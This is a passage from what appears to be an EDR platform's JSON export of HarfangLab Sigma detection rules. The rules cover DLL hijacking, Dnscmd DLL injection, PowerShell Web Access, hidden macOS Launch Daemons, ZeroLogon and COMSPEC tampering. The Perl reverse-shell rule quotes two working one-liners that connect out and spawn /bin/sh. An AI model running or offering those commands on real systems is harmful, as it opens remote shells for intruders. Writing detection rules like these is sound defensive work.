"content": "title: DLL Hijacking via Teams\nid: a16193ec-65ac-4236-8677-ea8c508bb28b\ndescription: |\n Detects potential Windows DLL Hijacking via Teams.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1550903546916311043\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Teams.exe'\n ImageLoaded|endswith: '\\iphlpapi.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a16193ec-65ac-4236-8677-ea8c508bb28b",
"rule_name": "DLL Hijacking via Teams",
"rule_description": "Detects potential Windows DLL Hijacking via Teams.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a176936a-ed50-4a97-b571-745ba57b6df2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093106Z",
"creation_date": "2026-03-23T11:45:34.093108Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093112Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netevtfwdr.yml",
"content": "title: DLL Hijacking via NetEvtFwdr.exe\nid: a176936a-ed50-4a97-b571-745ba57b6df2\ndescription: |\n Detects potential Windows DLL Hijacking via NetEvtFwdr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'NetEvtFwdr.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a176936a-ed50-4a97-b571-745ba57b6df2",
"rule_name": "DLL Hijacking via NetEvtFwdr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via NetEvtFwdr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a1bcb546-2d2e-4a4a-b5d2-050f7f179bbd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090659Z",
"creation_date": "2026-03-23T11:45:34.090661Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090665Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/",
"https://attack.mitre.org/techniques/T1210/"
],
"name": "t1210_possible_lateral_movement_using_dns_serverlevelplugindll.yml",
"content": "title: Possible Lateral Movement via DNS ServerLevelPluginDLL\nid: a1bcb546-2d2e-4a4a-b5d2-050f7f179bbd\ndescription: |\n Detects the usage of Dnscmd to inject a DLL inside a running DNS server.\n This tool can be used configure a remote (or local) DNS server to use a Server Level Plugin DLL.\n Attackers, provided that they already have elevated privileges, can use this technique to make the DNS server load a malicious and therefore perform either local proxy execution, persistence or lateral movement if the DNS server is distant.\n It is recommended to analyze the DLL specify on the command-line for malicious contents and to investigate the parent process for other suspicious activities.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/\n - https://attack.mitre.org/techniques/T1210/\ndate: 2022/12/04\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - attack.persistence\n - attack.t1543.003\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Dnscmd\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.ProcessInjection\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\dnscmd.exe'\n - OriginalFileName: 'dnscmd.exe'\n\n selection_args:\n CommandLine|contains|all:\n - ' ?config'\n - ' ?serverlevelplugindll'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a1bcb546-2d2e-4a4a-b5d2-050f7f179bbd",
"rule_name": "Possible Lateral Movement via DNS ServerLevelPluginDLL",
"rule_description": "Detects the usage of Dnscmd to inject a DLL inside a running DNS server.\nThis tool can be used configure a remote (or local) DNS server to use a Server Level Plugin DLL.\nAttackers, provided that they already have elevated privileges, can use this technique to make the DNS server load a malicious and therefore perform either local proxy execution, persistence or lateral movement if the DNS server is distant.\nIt is recommended to analyze the DLL specify on the command-line for malicious contents and to investigate the parent process for other suspicious activities.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1210",
"attack.t1218",
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a1d89f7b-31f9-409e-8e50-56b3bad0e73b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085896Z",
"creation_date": "2026-03-23T11:45:34.085899Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085903Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication",
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a",
"https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1219/"
],
"name": "t1059_001_powershell_web_access_installation.yml",
"content": "title: Windows PowerShell Web Access Enabled\nid: a1d89f7b-31f9-409e-8e50-56b3bad0e73b\ndescription: |\n Detects the installation of the PowerShell Web Access Feature.\n Powershell Web Access is a Windows Server Feature which can be used by adversaries for remote access.\n It is recommended to investigate the process that set the registry key for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication\n - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n - https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1219/\ndate: 2024/09/06\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1112\n - attack.command_and_control\n - attack.t1219\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Component Based Servicing\\Packages\\Microsoft-Windows-PowerShellWebAccess-Package*\\Updates\\WindowsPowerShellWebAccess'\n Details: 'DWORD (0x00000001)'\n\n exclusion_tiworker:\n ProcessImage: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a1d89f7b-31f9-409e-8e50-56b3bad0e73b",
"rule_name": "Windows PowerShell Web Access Enabled",
"rule_description": "Detects the installation of the PowerShell Web Access Feature.\nPowershell Web Access is a Windows Server Feature which can be used by adversaries for remote access.\nIt is recommended to investigate the process that set the registry key for suspicious activities.\n",
"rule_creation_date": "2024-09-06",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1112",
"attack.t1219"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a1ed8019-9b29-4699-9c30-056751959bd0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627371Z",
"creation_date": "2026-03-23T11:45:34.627373Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627378Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1152/"
],
"name": "t1543_004_new_daemon_hidden_file.yml",
"content": "title: New Hidden Launch Daemon File Added\nid: a1ed8019-9b29-4699-9c30-056751959bd0\ndescription: |\n Detects a new hidden Launch Daemon file being created.\n An attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\n An attacker could hide the file describing the Launch Daemons to hinder investigation and evade defenses.\n Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\n Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\n It is recommended to investigate the newly created Launch Daemon for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1152/\ndate: 2023/07/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.004\n - attack.t1152\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/bin/mv'\n - '/bin/cp'\n - '/usr/bin/rsync'\n CommandLine|contains:\n - ' /Library/LaunchDaemons/.'\n # Also catch /Users//Library/LaunchAgents/.\n - ' /Library/LaunchAgents/.'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a1ed8019-9b29-4699-9c30-056751959bd0",
"rule_name": "New Hidden Launch Daemon File Added",
"rule_description": "Detects a new hidden Launch Daemon file being created.\nAn attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\nAn attacker could hide the file describing the Launch Daemons to hinder investigation and evade defenses.\nLaunch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\nLaunch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\nIt is recommended to investigate the newly created Launch Daemon for malicious content.\n",
"rule_creation_date": "2023-07-11",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1152",
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a20dba34-aa51-4f61-a9f2-5eaff30f5810",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596590Z",
"creation_date": "2026-03-23T11:45:34.596593Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596601Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1078_zerologon_mimikatz.yml",
"content": "title: Mimikatz Netlogon Authentication Failed\nid: a20dba34-aa51-4f61-a9f2-5eaff30f5810\ndescription: |\n Detects when a netlogon connection attempt fails with mimikatz as machine name.\n This is the sign of a mimikatz lsadump::zerologon test or exploit attempt related to CVE-2020-1472 (aka ZeroLogon) exploitation.\n It is recommended to check the source of the connection and analyze the source machine for suspicious activities.\nreferences:\n - https://github.com/gentilkiwi/mimikatz\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472\n - https://attack.mitre.org/techniques/T1078/\ndate: 2020/11/13\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.credential_access\n - attack.t1078\n - cve.2020-1472\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.CVE-2020-1472\n - classification.Windows.Exploit.ZeroLogon\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: system\ndetection:\n selection_event:\n EventID: 5805\n\n selection_param:\n # this is normally param1, but we cannot be sure?\n - EventDataParam1: \"mimikatz\"\n - EventDataParam2: \"mimikatz\"\n\n condition: all of selection_*\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a20dba34-aa51-4f61-a9f2-5eaff30f5810",
"rule_name": "Mimikatz Netlogon Authentication Failed",
"rule_description": "Detects when a netlogon connection attempt fails with mimikatz as machine name.\nThis is the sign of a mimikatz lsadump::zerologon test or exploit attempt related to CVE-2020-1472 (aka ZeroLogon) exploitation.\nIt is recommended to check the source of the connection and analyze the source machine for suspicious activities.\n",
"rule_creation_date": "2020-11-13",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a2841070-5315-4b34-829e-4f0061d533c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602174Z",
"creation_date": "2026-03-23T11:45:34.602178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602185Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_recdisc.yml",
"content": "title: DLL Hijacking via recdisc.exe\nid: a2841070-5315-4b34-829e-4f0061d533c0\ndescription: |\n Detects potential Windows DLL Hijacking via recdisc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'recdisc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\ReAgent.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a2841070-5315-4b34-829e-4f0061d533c0",
"rule_name": "DLL Hijacking via recdisc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via recdisc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a31984d3-02cb-47d0-8652-a0456df9c2a6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069598Z",
"creation_date": "2026-03-23T11:45:34.069600Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069605Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_powershell_comspec_tampering.yml",
"content": "title: COMSPEC Tampered via PowerShell\nid: a31984d3-02cb-47d0-8652-a0456df9c2a6\ndescription: |\n Detects a tampering of the COMSPEC environment variable in a PowerShell script.\n Attackers may replace the COMSPEC variable to execute arbitrary binary instead of the default one.\n It is recommended to check for suspicious child processes spawned by the detected process.\nreferences:\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/21\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: '$env:comspec='\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a31984d3-02cb-47d0-8652-a0456df9c2a6",
"rule_name": "COMSPEC Tampered via PowerShell",
"rule_description": "Detects a tampering of the COMSPEC environment variable in a PowerShell script.\nAttackers may replace the COMSPEC variable to execute arbitrary binary instead of the default one.\nIt is recommended to check for suspicious child processes spawned by the detected process.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a31fa0da-8514-4ffd-8ebc-f3557607f34e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613567Z",
"creation_date": "2026-03-23T11:45:34.613570Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613578Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_perl_linux.yml",
"content": "title: Reverse Shell Executed via Perl (Linux)\nid: a31fa0da-8514-4ffd-8ebc-f3557607f34e\ndescription: |\n Detects different suspicious usages of Perl that are related to reverse shells.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\n It is recommended to analyze the executed script as well as to look for malicious processes and actions stemming from the perl process.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/10/07\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Perl\n - classification.Linux.Behavior.RemoteShell\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n selection_perl1:\n CommandLine|contains|all:\n - 'perl'\n - ' Socket'\n - 'socket('\n - 'connect('\n - 'open('\n - 'STDIN'\n - 'STDOUT'\n - 'exec('\n\n # perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"[IPADDR]:[PORT]\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n selection_perl2:\n CommandLine|contains|all:\n - 'perl'\n - 'IO::Socket::INET('\n - 'STDIN'\n - 'fdopen('\n - 'system'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a31fa0da-8514-4ffd-8ebc-f3557607f34e",
"rule_name": "Reverse Shell Executed via Perl (Linux)",
"rule_description": "Detects different suspicious usages of Perl that are related to reverse shells.\nA reverse shell is shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewall restrictions.\nIt is recommended to analyze the executed script as well as to look for malicious processes and actions stemming from the perl process.\n",
